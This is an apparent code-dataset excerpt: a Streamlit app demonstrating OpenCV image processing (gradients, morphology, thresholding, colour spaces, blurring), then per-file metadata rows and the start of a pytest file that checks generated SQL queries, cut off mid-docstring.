        with st.expander('Show Magnitude - Orientation Image Gradients - Streamlit', expanded=True):
            cols = st.columns(3)
            cols[0].markdown("Grayscale")
            cols[0].image(gray)
            cols[1].markdown("Gradient Magnitude")
            cols[1].image(imC1, channels='BGR')
            with cols[1]:
                download_button1(imC1, button, download, mime_type, key='3.1')
            cols[2].markdown("Gradient Orientation [0, 180]")
            cols[2].image(imC2, channels='BGR')
            with cols[2]:
                download_button1(imC2, button, download, mime_type, key='3.2')
        # Matplotlib rendering of the same three images, ticks removed.
        (fig, axs) = plt.subplots(nrows=1, ncols=3, figsize=(8, 4))
        axs[0].imshow(gray, cmap="gray")
        axs[1].imshow(magnitude, cmap="jet")
        axs[2].imshow(orientation, cmap="jet")
        axs[0].set_title("Grayscale")
        axs[1].set_title("Gradient Magnitude")
        axs[2].set_title("Gradient Orientation [0, 180]")
        for i in range(0, 3):
            axs[i].get_xaxis().set_ticks([])
            axs[i].get_yaxis().set_ticks([])
        with st.expander('Show Magnitude - Orientation Image Gradients - Mapplotlib'):
            plt.tight_layout()
            st.pyplot(fig)
    source_code(
        'Source Code + Image Gradients Tutorial pyimagesearch.com',
        'https://pyimagesearch.com/2021/05/12/image-gradients-with-opencv-sobel-and-scharr/',
        'https://gist.github.com/jjaramillo34/4a40d2faeddda4c1275b2c40c86260a4')
    with st.expander('DuckDuckGo Search Results'):
        # Bug fix: this section was a copy-paste of the morphological
        # operations one; it now searches for image gradients.
        st.subheader('More About Image Gradients')
        scrape_duckduckgo('image gradients opencv')
def _morphological_hats(image, gray):
    """Show blackhat/tophat results for *gray* alongside *image*."""
    # A rectangular 13x5 kernel; blackhat reveals dark regions on a light
    # background, tophat ("whitehat") reveals light regions on a dark one.
    rectKernel = cv.getStructuringElement(cv.MORPH_RECT, (13, 5))
    blackhat = cv.morphologyEx(gray, cv.MORPH_BLACKHAT, rectKernel)
    tophat = cv.morphologyEx(gray, cv.MORPH_TOPHAT, rectKernel)
    st.subheader('Morphological Hats')
    with st.expander('Show Original Image'):
        st.markdown("Original")
        st.image(image)
    with st.expander('Show Morphological Hats', expanded=True):
        cols = st.columns(2)
        cols[0].markdown("Blackhat")
        cols[0].image(blackhat)
        with cols[0]:
            download_button1(blackhat, button, download, mime_type, key='hats.1')
        cols[1].markdown("Tophat")
        cols[1].image(tophat)
        with cols[1]:
            download_button1(tophat, button, download, mime_type, key='hats.2')


def _morphological_ops(image, gray):
    """Show erosion/dilation/opening/closing/gradient series for *gray*,
    plus two interactive variants, each with download buttons.

    Download-button keys are unique per expander: the original reused
    ``f'{i}.{i}'`` in five expanders and duplicated number_input labels,
    which raises Streamlit's DuplicateWidgetID error.
    """
    kernelSizes = [(3, 3), (5, 5), (7, 7)]
    with st.expander('Show Morphological Operations - Erosion', expanded=True):
        cols = st.columns(4)
        cols[0].markdown("Original")
        cols[0].image(image)
        # apply a series of erosions
        for i in range(0, 3):
            eroded = cv.erode(gray.copy(), None, iterations=i + 1)
            cols[i + 1].markdown("Eroded {} times".format(i + 1))
            cols[i + 1].image(eroded)
            with cols[i + 1]:
                download_button1(eroded, button, download, mime_type, key=f'erode.{i}')
    with st.expander('Show Morphological Operations - Dilation'):
        cols = st.columns(4)
        cols[0].markdown("Original")
        cols[0].image(image)
        # apply a series of dilations
        for i in range(0, 3):
            dilated = cv.dilate(gray.copy(), None, iterations=i + 1)
            cols[i + 1].markdown("Dilated {} times".format(i + 1))
            cols[i + 1].image(dilated)
            with cols[i + 1]:
                download_button1(dilated, button, download, mime_type, key=f'dilate.{i}')
    with st.expander('Show Morphological Operations - Opening'):
        cols = st.columns(4)
        cols[0].markdown("Original")
        cols[0].image(image)
        # opening = erosion followed by dilation; removes small blobs
        for i, kernelSize in enumerate(kernelSizes):
            kernel = cv.getStructuringElement(cv.MORPH_RECT, kernelSize)
            opening = cv.morphologyEx(gray, cv.MORPH_OPEN, kernel)
            cols[i + 1].markdown("Opening: ({}, {})".format(
                kernelSize[0], kernelSize[1]))
            cols[i + 1].image(opening)
            with cols[i + 1]:
                download_button1(opening, button, download, mime_type, key=f'open.{i}')
    with st.expander('Show Morphological Operations - Closing'):
        cols = st.columns(4)
        cols[0].markdown("Original")
        cols[0].image(image)
        # closing = dilation followed by erosion; fills small holes
        for i, kernelSize in enumerate(kernelSizes):
            kernel = cv.getStructuringElement(cv.MORPH_RECT, kernelSize)
            closing = cv.morphologyEx(gray, cv.MORPH_CLOSE, kernel)
            cols[i + 1].markdown("Closing: ({}, {})".format(
                kernelSize[0], kernelSize[1]))
            cols[i + 1].image(closing)
            with cols[i + 1]:
                download_button1(closing, button, download, mime_type, key=f'close.{i}')
    with st.expander('Show Morphological Operations - Gradient'):
        cols = st.columns(4)
        cols[0].markdown("Original")
        cols[0].image(image)
        # morphological gradient = dilation minus erosion (object outlines)
        for i, kernelSize in enumerate(kernelSizes):
            kernel = cv.getStructuringElement(cv.MORPH_RECT, kernelSize)
            gradient = cv.morphologyEx(gray, cv.MORPH_GRADIENT, kernel)
            cols[i + 1].markdown("Gradient: ({}, {})".format(
                kernelSize[0], kernelSize[1]))
            cols[i + 1].image(gradient)
            with cols[i + 1]:
                download_button1(gradient, button, download, mime_type, key=f'grad.{i}')
    with st.expander('Show Interactive Morphological Operations - Erosion, Dilation', expanded=True):
        # Typo fix in the label ("Erored" -> "Eroded").
        x = st.number_input('Eroded-Dilated Iterations', 1, 6)
        cols = st.columns(3)
        cols[0].markdown("Original")
        cols[0].image(image)
        eroded = cv.erode(gray.copy(), None, iterations=x)
        cols[1].markdown("Eroded {} times".format(x))
        cols[1].image(eroded)
        with cols[1]:
            download_button1(eroded, button, download, mime_type, key='inter.1')
        dilated = cv.dilate(gray.copy(), None, iterations=x)
        cols[2].markdown("Dilated {} times".format(x))
        cols[2].image(dilated)
        with cols[2]:
            download_button1(dilated, button, download, mime_type, key='inter.2')
    with st.expander('Show Interactive Morphological Operations - Opening, Closing & Gradient'):
        # Explicit keys: two number_inputs with the same label would
        # otherwise collide. kY mirrors kX and is shown disabled.
        kX = st.number_input('Opening, Closing & Gradient Kernel Size', 1, 11, step=2, key='morph.kx')
        kY = st.number_input('Opening, Closing & Gradient Kernel Size', int(kX), 11, step=2, disabled=True, key='morph.ky')
        kernelSize = [(kX, kY)]
        cols = st.columns(4)
        cols[0].markdown("Original")
        cols[0].image(image)
        kernel = cv.getStructuringElement(cv.MORPH_RECT, (kX, kY))
        opening = cv.morphologyEx(gray, cv.MORPH_OPEN, kernel)
        cols[1].markdown("Opening: ({}, {})".format(
            kernelSize[0][0], kernelSize[0][1]))
        cols[1].image(opening)
        with cols[1]:
            # Bug fix: previously downloaded `eroded` instead of `opening`.
            download_button1(opening, button, download, mime_type, key='interk.1')
        kernel = cv.getStructuringElement(cv.MORPH_RECT, (kX, kY))
        closing = cv.morphologyEx(gray, cv.MORPH_CLOSE, kernel)
        cols[2].markdown("Closing: ({}, {})".format(
            kernelSize[0][0], kernelSize[0][1]))
        cols[2].image(closing)
        with cols[2]:
            download_button1(closing, button, download, mime_type, key='interk.2')
        kernel = cv.getStructuringElement(cv.MORPH_RECT, (kX, kY))
        gradient = cv.morphologyEx(gray, cv.MORPH_GRADIENT, kernel)
        cols[3].markdown("Gradient: ({}, {})".format(
            kernelSize[0][0], kernelSize[0][1]))
        cols[3].image(gradient)
        with cols[3]:
            download_button1(gradient, button, download, mime_type, key='interk.3')


def morphological_operations():
    """Render the Morphological Operations demo.

    Two modes selected from the sidebar:
      * "Morphological Hats" — blackhat/tophat transforms.
      * "Morphological Operations" — erosion, dilation, opening, closing
        and morphological gradient series plus interactive controls.
    Works on an uploaded image, or a default noisy-logo image otherwise.
    The uploaded/default branches previously duplicated ~140 lines each;
    only the image-loading step differs, so the rendering lives in the
    private helpers above.
    """
    st.header("Morphological Operations Demo")
    options = st.sidebar.radio('Morphological Operations Options', ('Morphological Hats', 'Morphological Operations'))
    # Bug fix: 'jpge' -> 'jpeg' so .jpeg uploads are accepted.
    img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpeg'])
    # Rendered for UI parity with the other demos; not consulted here.
    realtime_update = st.sidebar.checkbox(label="Update in Real Time", value=True)
    if img_file is not None:
        image = converted(load_image_PIL(img_file))
    else:
        image = load_image('images/pyimagesearch_logo_noise.png')
    gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
    if options == 'Morphological Hats':
        _morphological_hats(image, gray)
    else:
        _morphological_ops(image, gray)
    source_code(
        'Source Code + Morphological Operations Tutorial pyimagesearch.com',
        'https://pyimagesearch.com/2021/04/28/opencv-morphological-operations/',
        'https://gist.github.com/jjaramillo34/3c1a8489e7882a3dba1127f3046c2a78')
    with st.expander('DuckDuckGo Search Results'):
        st.subheader('More About Morphological Operations')
        scrape_duckduckgo('morphological operations opencv')
def thresholding():
    """Streamlit demo page for image thresholding.

    Sidebar modes:
      * "Simple Thresholding"  -- fixed (T=200) and slider-driven binary /
        inverse-binary thresholds plus the masked original.
      * "Otsu's Thresholding"  -- automatic global threshold selection.

    Works on an uploaded image when one is provided, otherwise on the
    module-level ``default_image``.

    Fixes vs. the previous version:
      * the Otsu "Output" download button now downloads the masked image
        (it used to re-download the threshold mask);
      * uploader accepts 'jpeg' (was the typo 'jpge');
      * the uploaded/default code paths share one implementation, so
        their widget keys can no longer drift apart.
    """
    st.header("Thresholding Demo")
    options = st.sidebar.radio('Thresholding Options', ('Simple Thresholding', "Otsu's Thresholding"))
    realtime_update = st.sidebar.checkbox(label="Update in Real Time", value=True)
    img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpeg'])

    # Single load path for both "uploaded" and "default" cases.
    if img_file is not None:
        image = converted(load_image_PIL(img_file))
    else:
        image = load_image(default_image)

    def _preprocess(img):
        # Grayscale + light Gaussian blur: standard prep before thresholding.
        gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
        return cv.GaussianBlur(gray, (7, 7), 0)

    def _simple_panel(img, blurred, thresh_value, key_prefix):
        # One 3-column row: inverse-binary threshold, binary threshold,
        # and the original visualized only where the inverse mask is set.
        cols = st.columns(3)
        (T, threshInv) = cv.threshold(blurred, thresh_value, 255, cv.THRESH_BINARY_INV)
        cols[0].markdown("Threshold Binary Inverse")
        cols[0].image(threshInv)
        with cols[0]:
            download_button1(threshInv, button, download, mime_type, key=f'{key_prefix}.1')
        # Normal (rather than inverse) thresholding.
        (T, thresh) = cv.threshold(blurred, thresh_value, 255, cv.THRESH_BINARY)
        cols[1].markdown("Threshold Binary")
        cols[1].image(thresh)
        with cols[1]:
            download_button1(thresh, button, download, mime_type, key=f'{key_prefix}.2')
        # Visualize only the masked regions of the original image.
        masked = cv.bitwise_and(img, img, mask=threshInv)
        cols[2].markdown("Masked")
        cols[2].image(masked)
        with cols[2]:
            download_button1(masked, button, download, mime_type, key=f'{key_prefix}.3')

    if options == 'Simple Thresholding':
        with st.expander('Show Original Image'):
            st.markdown(original)
            st.image(image)
        blurred = _preprocess(image)
        with st.expander('Show Simple Thresholding', expanded=True):
            # Fixed threshold: pixels above 200 go to 0 (inverse) / 255 (normal).
            _simple_panel(image, blurred, 200, key_prefix='1')
        with st.expander('Show Simple Thresholding Auto', expanded=True):
            # Same panel, but the threshold comes from a slider.
            x = st.slider('Change Threshold value', min_value=50, max_value=255)
            _simple_panel(image, blurred, x, key_prefix='2')
    else:
        with st.expander('Show Original Image'):
            st.markdown("Image")
            st.image(image)
        blurred = _preprocess(image)
        with st.expander("Show Otsu's Thresholding", expanded=True):
            cols = st.columns(2)
            # Otsu automatically determines the best global threshold T.
            (T, threshInv) = cv.threshold(blurred, 0, 255,
                                          cv.THRESH_BINARY_INV | cv.THRESH_OTSU)
            cols[0].markdown("Threshold")
            cols[0].image(threshInv)
            st.success("[INFO] otsu's thresholding value: {}".format(T))
            with cols[0]:
                download_button1(threshInv, button, download, mime_type, key='1.1')
            # Visualize only the masked regions in the image.
            masked = cv.bitwise_and(image, image, mask=threshInv)
            cols[1].markdown("Output")
            cols[1].image(masked)
            with cols[1]:
                # BUG FIX: download the masked output, not the threshold mask.
                download_button1(masked, button, download, mime_type, key='1.2')

    source_code(
        'Source Code + Thresholding Tutorial pyimagesearch.com',
        'https://pyimagesearch.com/2021/04/28/opencv-thresholding-cv2-threshold/',
        'https://gist.github.com/jjaramillo34/d504d5a9d6f88833c3720f132e734193')
    with st.expander('DuckDuckGo Search Results'):
        st.subheader('More About Thresholding')  # fixed 'Thesholding' typo
        scrape_duckduckgo('opencv thresholding')
def color_spaces():
    """Streamlit demo of BGR, HSV, L*a*b* and grayscale color spaces.

    Shows the image alongside each of its split channels, with a download
    button per channel. Uses the uploaded image when present, otherwise
    the module-level ``default_image``.

    Fixes vs. the previous version:
      * per-expander widget key prefixes -- the old code reused
        ``key=f'{i}.{i}'`` in every channel loop, which raises Streamlit's
        DuplicateWidgetID error as soon as two expanders render;
      * the "Grayscale" download button now downloads the grayscale image
        (it used to download the original);
      * uploader accepts 'jpeg' (was the typo 'jpge').
    """
    st.header("Color Spaces Demo")
    img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpeg'])
    realtime_update = st.sidebar.checkbox(label="Update in Real Time", value=True)

    # Single load path for both "uploaded" and "default" cases.
    if img_file is not None:
        image = converted(load_image_PIL(img_file))
    else:
        image = load_image(default_image)

    def _channel_panel(title, space_img, channel_names, key_prefix):
        # Column 0: the (possibly converted) image; columns 1-3: its channels.
        cols = st.columns(4)
        with cols[0]:
            st.markdown(title)
            st.image(space_img)
        for i, (name, chan) in enumerate(zip(channel_names, cv.split(space_img))):
            with cols[i + 1]:
                st.markdown(name)
                st.image(chan)
                # key_prefix keeps download-button keys unique across expanders.
                download_button1(chan, button, download, mime_type, key=f'{key_prefix}.{i}')

    with st.expander('Show RGB Color Spaces', expanded=True):
        _channel_panel("RGB Color Spaces", image, ("B", "G", "R"), key_prefix='rgb')
    with st.expander('Show HSV Color Spaces'):
        _channel_panel("HSV Color Spaces",
                       cv.cvtColor(image, cv.COLOR_BGR2HSV),
                       ("H", "S", "V"), key_prefix='hsv')
    with st.expander('Show L*a*b* Color Spaces'):
        _channel_panel("L*a*b*",
                       cv.cvtColor(image, cv.COLOR_BGR2LAB),
                       ("L*", "a*", "b*"), key_prefix='lab')
    with st.expander('Show Grayscale'):
        # Show the original and grayscale versions side by side.
        cols = st.columns(2)
        gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
        cols[0].markdown("Original")
        cols[0].image(image)
        with cols[0]:
            download_button1(image, button, download, mime_type, key='gray.1')
        cols[1].markdown("Grayscale")
        cols[1].image(gray)
        with cols[1]:
            # BUG FIX: was downloading the original image here.
            download_button1(gray, button, download, mime_type, key='gray.2')

    source_code(
        'Source Code + Color Spaces Tutorial pyimagesearch.com',
        'https://pyimagesearch.com/2021/04/28/opencv-color-spaces-cv2-cvtcolor/',
        'https://gist.github.com/jjaramillo34/74ef1a86014fb4fd7617c03ea10c3602')
    with st.expander('DuckDuckGo Search Results'):
        t = 'Color Spaces'
        st.subheader(f'More About {t.capitalize()}')
        scrape_duckduckgo(f'opencv {t}')
def smoothing_blurring():
    """Streamlit demo of bilateral filtering and average/Gaussian/median blurs.

    Sidebar modes:
      * "Bilateral" -- three hard-coded (d, sigmaColor, sigmaSpace) sets
        plus an interactive slider-driven version.
      * "Blurring"  -- average, Gaussian, and median blurs at three kernel
        sizes, plus number-input-driven versions.

    Fixes vs. the previous version:
      * unique widget key prefixes per expander -- the old code reused
        ``key=f'{i}'`` across the Average/Gaussian/Median loops (and those
        keys collided with the bilateral sliders' keys '1'/'2'/'3'),
        raising Streamlit's DuplicateWidgetID error;
      * the uploaded/default code paths share one implementation, so keys
        can no longer drift apart (they were '3.x' vs '4.x');
      * uploader accepts 'jpeg' (was the typo 'jpge').
    """
    st.header("Smoothing & Blurring Demo")
    options = st.sidebar.radio('Smoothing & Blurring Options', ('Bilateral', 'Blurring'))
    img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpeg'])
    realtime_update = st.sidebar.checkbox(label="Update in Real Time", value=True)

    # Single load path for both "uploaded" and "default" cases.
    if img_file is not None:
        image = converted(load_image_PIL(img_file))
    else:
        image = load_image(default_image)

    with st.expander('Show Original Image'):
        st.image(image)

    if options == 'Bilateral':
        # Hard-coded (diameter, sigmaColor, sigmaSpace) parameter sets.
        params = [(11, 21, 7), (11, 41, 21), (11, 61, 39)]
        with st.expander('Bilateral Blurring', expanded=True):
            st.subheader('Bilateral Blurring')
            cols = st.columns(3)
            for i, (diameter, sigmaColor, sigmaSpace) in enumerate(params):
                # Apply bilateral filtering with the current parameter set.
                blurred = cv.bilateralFilter(image, diameter, sigmaColor, sigmaSpace)
                title = "Blurred d={}, sc={}, ss={}".format(diameter, sigmaColor, sigmaSpace)
                with cols[i]:
                    st.markdown(title)
                    st.image(blurred)
                    download_button1(blurred, button, download, mime_type, key=f'bilateral.{i}')
        with st.expander('Bilateral Blurring Interactive'):
            st.subheader('Bilateral Blurring Interactive')
            cols = st.columns(3)
            d = cols[0].slider('Select starting diameter', min_value=11, max_value=100, step=1, key='bi.d')
            sc = cols[1].slider('Select starting sigmaColor', min_value=21, max_value=100, step=1, key='bi.sc')
            ss = cols[2].slider('Select starting sigmaSpace', min_value=7, max_value=100, step=1, key='bi.ss')
            blurred = cv.bilateralFilter(image, d, sc, ss)
            st.markdown("Blurred d={}, sc={}, ss={}".format(d, sc, ss))
            st.image(blurred)
            download_button1(blurred, button, download, mime_type, key='bi.out')
    else:
        # Kernel sizes, so we can evaluate the relationship between kernel
        # size and amount of blurring.
        kernelSizes = [(3, 3), (9, 9), (15, 15)]
        with st.expander('Show Average Blur', expanded=True):
            cols = st.columns(3)
            for i, (kX, kY) in enumerate(kernelSizes):
                with cols[i]:
                    blurred = cv.blur(image, (kX, kY))
                    st.markdown("Average Blur ({}, {})".format(kX, kY))
                    st.image(blurred)
                    download_button1(blurred, button, download, mime_type, key=f'avg.{i}')
        with st.expander('Show Gaussian Blur'):
            cols = st.columns(3)
            for i, (kX, kY) in enumerate(kernelSizes):
                with cols[i]:
                    blurred = cv.GaussianBlur(image, (kX, kY), 0)
                    st.markdown("Gaussian Blur ({}, {})".format(kX, kY))
                    st.image(blurred)
                    download_button1(blurred, button, download, mime_type, key=f'gauss.{i}')
        with st.expander('Show Median Blur'):
            cols = st.columns(3)
            # Median blur takes a single (odd) kernel dimension.
            for i, k in enumerate((3, 9, 15)):
                with cols[i]:
                    blurred = cv.medianBlur(image, k)
                    st.markdown("Median Blur {}".format(k))
                    st.image(blurred)
                    download_button1(blurred, button, download, mime_type, key=f'median.{i}')
        with st.expander('Show Auto Blurring', expanded=True):
            cols = st.columns(3)
            kX = cols[0].number_input('Kernel Sizes kX', min_value=1, max_value=25, step=2, key='2.1')
            # kY mirrors kX (disabled input kept purely for display).
            kY = cols[1].number_input('Kernel Sizes kY', min_value=1, max_value=25, step=2, key='2.2', value=kX, disabled=True)
            k = cols[2].number_input('Kernel Sizes k', min_value=1, max_value=25, step=2, key='2.3')
            blurred = cv.blur(image, (kX, kX))
            cols[0].markdown("Average Blur ({}, {})".format(kX, kY))
            cols[0].image(blurred)
            with cols[0]:
                download_button1(blurred, button, download, mime_type, key='3.1')
            blurred = cv.GaussianBlur(image, (kX, kY), 0)
            cols[1].markdown("Gaussian Blur ({}, {})".format(kX, kY))
            cols[1].image(blurred)
            with cols[1]:
                download_button1(blurred, button, download, mime_type, key='3.2')
            blurred = cv.medianBlur(image, k)
            cols[2].markdown("Median Blur {}".format(k))
            cols[2].image(blurred)
            with cols[2]:
                download_button1(blurred, button, download, mime_type, key='3.3')

    source_code(
        'Source Code + Smoothing and Blurring Tutorial pyimagesearch.com',
        'https://pyimagesearch.com/2021/04/28/opencv-smoothing-and-blurring/',
        'https://gist.github.com/jjaramillo34/84863214120f9e6bcf49874670250ebb')
    with st.expander('DuckDuckGo Search Results'):
        t = 'blurring and smoothing'
        st.subheader(f'More About {t.capitalize()}')
        scrape_duckduckgo(f'opencv {t}')
| 48.611443
| 179
| 0.549202
| 11,350
| 97,709
| 4.6637
| 0.065903
| 0.015718
| 0.033325
| 0.040731
| 0.879357
| 0.860692
| 0.851076
| 0.84658
| 0.84486
| 0.84129
| 0
| 0.031173
| 0.340429
| 97,709
| 2,010
| 180
| 48.611443
| 0.789948
| 0.120112
| 0
| 0.802853
| 0
| 0.018807
| 0.207217
| 0.011756
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007134
| false
| 0
| 0.01297
| 0
| 0.020752
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b6f2bd5dd43dcfec4c7f3689f4ed9bf781c9561c
| 19,392
|
py
|
Python
|
tests/test_join_query.py
|
Zenlytic/granite
|
93cc523954b1b900d7893af803a8fb3e5fc7d343
|
[
"Apache-2.0"
] | null | null | null |
tests/test_join_query.py
|
Zenlytic/granite
|
93cc523954b1b900d7893af803a8fb3e5fc7d343
|
[
"Apache-2.0"
] | null | null | null |
tests/test_join_query.py
|
Zenlytic/granite
|
93cc523954b1b900d7893af803a8fb3e5fc7d343
|
[
"Apache-2.0"
] | null | null | null |
# import pytest
def test_query_no_join(connection):
    """A single-view query (no joins) groups by the bare dimension SQL."""
    expected = (
        "SELECT order_lines.sales_channel as order_lines_channel,"
        "SUM(order_lines.revenue) as order_lines_total_item_revenue "
        "FROM analytics.order_line_items order_lines GROUP BY order_lines.sales_channel;"
    )
    generated = connection.get_sql_query(metrics=["total_item_revenue"], dimensions=["channel"])
    assert generated == expected
def test_alias_only_query(connection):
    """alias_only rendering references the field's alias, not its raw SQL."""
    revenue_metric = connection.get_metric(metric_name="total_item_revenue")
    rendered = revenue_metric.sql_query(query_type="SNOWFLAKE", alias_only=True)
    assert rendered == "SUM(order_lines_total_item_revenue)"
def test_alias_only_query_number(connection):
    """A number-type metric renders as arithmetic over its referenced aliases."""
    aov_metric = connection.get_metric(metric_name="line_item_aov")
    rendered = aov_metric.sql_query(query_type="SNOWFLAKE", alias_only=True)
    assert rendered == "SUM(order_lines_total_item_revenue) / COUNT(orders_number_of_orders)"
def test_alias_only_query_symmetric_average_distinct(connection):
    """alias_only rendering of an average_distinct metric must still emit the
    full symmetric-aggregate construct: SUM(DISTINCT value-hash) minus the
    hash correction, divided by COUNT(DISTINCT non-null ids), so the average
    stays correct across fan-out joins."""
    metric = connection.get_metric(metric_name="average_order_revenue")
    query = metric.sql_query(query_type="SNOWFLAKE", alias_only=True)
    correct = (
        "(COALESCE(CAST((SUM(DISTINCT (CAST(FLOOR(COALESCE(order_lines_average_order_revenue, 0) "
        "* (1000000 * 1.0)) AS DECIMAL(38,0))) + (TO_NUMBER(MD5(order_lines_order_id), "
        "'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') % 1.0e27)::NUMERIC(38, 0)) "
        "- SUM(DISTINCT (TO_NUMBER(MD5(order_lines_order_id), 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') "
        "% 1.0e27)::NUMERIC(38, 0))) AS DOUBLE PRECISION) / CAST((1000000*1.0) AS "
        "DOUBLE PRECISION), 0) / NULLIF(COUNT(DISTINCT CASE WHEN (order_lines_average_order_revenue) "
        "IS NOT NULL THEN order_lines_order_id ELSE NULL END), 0))"
    )
    assert query == correct
def test_query_no_join_average_distinct(connection):
    """Even with no joins in the query, an average_distinct metric renders the
    symmetric-aggregate SUM(DISTINCT)/COUNT(DISTINCT) form, hashed on the
    view's order_unique_id column."""
    query = connection.get_sql_query(metrics=["average_order_revenue"], dimensions=["channel"])
    correct = (
        "SELECT order_lines.sales_channel as order_lines_channel,(COALESCE(CAST((SUM(DISTINCT "
        "(CAST(FLOOR(COALESCE(order_lines.order_total, 0) * (1000000 * 1.0)) AS DECIMAL(38,0))) "
        "+ (TO_NUMBER(MD5(order_lines.order_unique_id), 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') "
        "% 1.0e27)::NUMERIC(38, 0)) - SUM(DISTINCT (TO_NUMBER(MD5(order_lines.order_unique_id), "
        "'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') % 1.0e27)::NUMERIC(38, 0))) AS DOUBLE PRECISION) "
        "/ CAST((1000000*1.0) AS DOUBLE PRECISION), 0) / NULLIF(COUNT(DISTINCT CASE WHEN "
        "(order_lines.order_total) IS NOT NULL THEN order_lines.order_unique_id ELSE NULL END), 0)) "
        "as order_lines_average_order_revenue FROM analytics.order_line_items order_lines "
        "GROUP BY order_lines.sales_channel;"
    )
    assert query == correct
def test_query_single_join(connection):
    """Requesting a dimension from a second view triggers a LEFT JOIN to orders."""
    expected = (
        "SELECT order_lines.sales_channel as order_lines_channel,"
        "orders.new_vs_repeat as orders_new_vs_repeat,"
        "SUM(order_lines.revenue) as order_lines_total_item_revenue FROM "
        "analytics.order_line_items order_lines LEFT JOIN analytics.orders orders ON "
        "order_lines.order_unique_id=orders.id GROUP BY order_lines.sales_channel,orders.new_vs_repeat;"
    )
    generated = connection.get_sql_query(metrics=["total_item_revenue"], dimensions=["channel", "new_vs_repeat"])
    assert generated == expected
def test_query_single_dimension(connection):
    """A joined dimension with no metrics still emits the join and GROUP BY."""
    expected = (
        "SELECT orders.new_vs_repeat as orders_new_vs_repeat FROM "
        "analytics.order_line_items order_lines LEFT JOIN analytics.orders orders ON "
        "order_lines.order_unique_id=orders.id GROUP BY orders.new_vs_repeat;"
    )
    generated = connection.get_sql_query(metrics=[], dimensions=["new_vs_repeat"])
    assert generated == expected
def test_query_single_dimension_with_comment(connection):
    """SQL comments (and their embedded newlines) inside a dimension's
    definition must survive verbatim in both the SELECT expression and the
    repeated expression in the GROUP BY clause."""
    query = connection.get_sql_query(metrics=["total_item_revenue"], dimensions=["parent_channel"])
    correct = (
        "SELECT CASE\n--- parent channel\nWHEN order_lines.sales_channel ilike '%social%' then "
        "'Social'\nELSE 'Not Social'\nEND as order_lines_parent_channel,"
        "SUM(order_lines.revenue) as order_lines_total_item_revenue "
        "FROM analytics.order_line_items order_lines GROUP BY CASE\n--- parent channel\nWHEN "
        "order_lines.sales_channel ilike '%social%' then 'Social'\nELSE 'Not Social'\nEND;"
    )
    assert query == correct
def test_query_single_dimension_with_multi_filter(connection):
    """A multi-filter metric renders as CASE WHEN and forces the join its filters need."""
    generated = connection.get_sql_query(metrics=["total_item_costs"], dimensions=["channel"])
    expected = (
        "SELECT order_lines.sales_channel as order_lines_channel,SUM(case when order_lines.product_name "
        "= 'Portable Charger' and orders.revenue * 100 > 100 then order_lines.item_costs end) "
        "as order_lines_total_item_costs FROM analytics.order_line_items order_lines LEFT JOIN "
        "analytics.orders orders ON order_lines.order_unique_id=orders.id "
        "GROUP BY order_lines.sales_channel;"
    )
    assert generated == expected
def test_query_single_dimension_sa_duration(connection):
    """A symmetric-aggregate average over a duration (DATEDIFF between order
    dates) must wrap the DATEDIFF expression in the full hashed
    SUM(DISTINCT)/COUNT(DISTINCT) construct and join through to orders."""
    query = connection.get_sql_query(metrics=["average_days_between_orders"], dimensions=["product_name"])
    correct = (
        "SELECT order_lines.product_name as order_lines_product_name,(COALESCE(CAST((SUM(DISTINCT "
        "(CAST(FLOOR(COALESCE(DATEDIFF('DAY', orders.previous_order_date, orders.order_date), 0) "
        "* (1000000 * 1.0)) AS DECIMAL(38,0))) + (TO_NUMBER(MD5(orders.id), "
        "'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') % 1.0e27)::NUMERIC(38, 0)) "
        "- SUM(DISTINCT (TO_NUMBER(MD5(orders.id), 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') "
        "% 1.0e27)::NUMERIC(38, 0))) AS DOUBLE PRECISION) / CAST((1000000*1.0) AS DOUBLE PRECISION), 0) "
        "/ NULLIF(COUNT(DISTINCT CASE WHEN (DATEDIFF('DAY', orders.previous_order_date, "
        "orders.order_date)) IS NOT NULL THEN orders.id "
        "ELSE NULL END), 0)) as orders_average_days_between_orders "
        "FROM analytics.order_line_items order_lines LEFT JOIN analytics.orders orders "
        "ON order_lines.order_unique_id=orders.id GROUP BY order_lines.product_name;"
    )
    assert query == correct
def test_query_single_join_count(connection):
    """A count metric in an explicit explore renders COUNT over the view's key."""
    expected = (
        "SELECT order_lines.sales_channel as order_lines_channel,"
        "orders.new_vs_repeat as orders_new_vs_repeat,"
        "COUNT(order_lines.order_line_id) as order_lines_count FROM "
        "analytics.order_line_items order_lines LEFT JOIN analytics.orders orders ON "
        "order_lines.order_unique_id=orders.id GROUP BY order_lines.sales_channel,orders.new_vs_repeat;"
    )
    generated = connection.get_sql_query(
        metrics=["order_lines.count"],
        dimensions=["channel", "new_vs_repeat"],
        explore_name="order_lines_all",
    )
    assert generated == expected
def test_query_single_join_metric_with_sub_field(connection):
    """A metric referencing a field from another view joins through to that view."""
    expected = (
        "SELECT order_lines.sales_channel as order_lines_channel,SUM(order_lines.revenue) "
        "/ NULLIF(COUNT(DISTINCT CASE WHEN (orders.id) IS NOT NULL "
        "THEN orders.id ELSE NULL END), 0) as order_lines_line_item_aov "
        "FROM analytics.order_line_items order_lines LEFT JOIN analytics.orders orders "
        "ON order_lines.order_unique_id=orders.id GROUP BY order_lines.sales_channel;"
    )
    generated = connection.get_sql_query(
        metrics=["line_item_aov"],
        dimensions=["channel"],
    )
    assert generated == expected
def test_query_single_join_with_forced_additional_join(connection):
    """BIGQUERY dialect: a metric living several joins away must pull in the
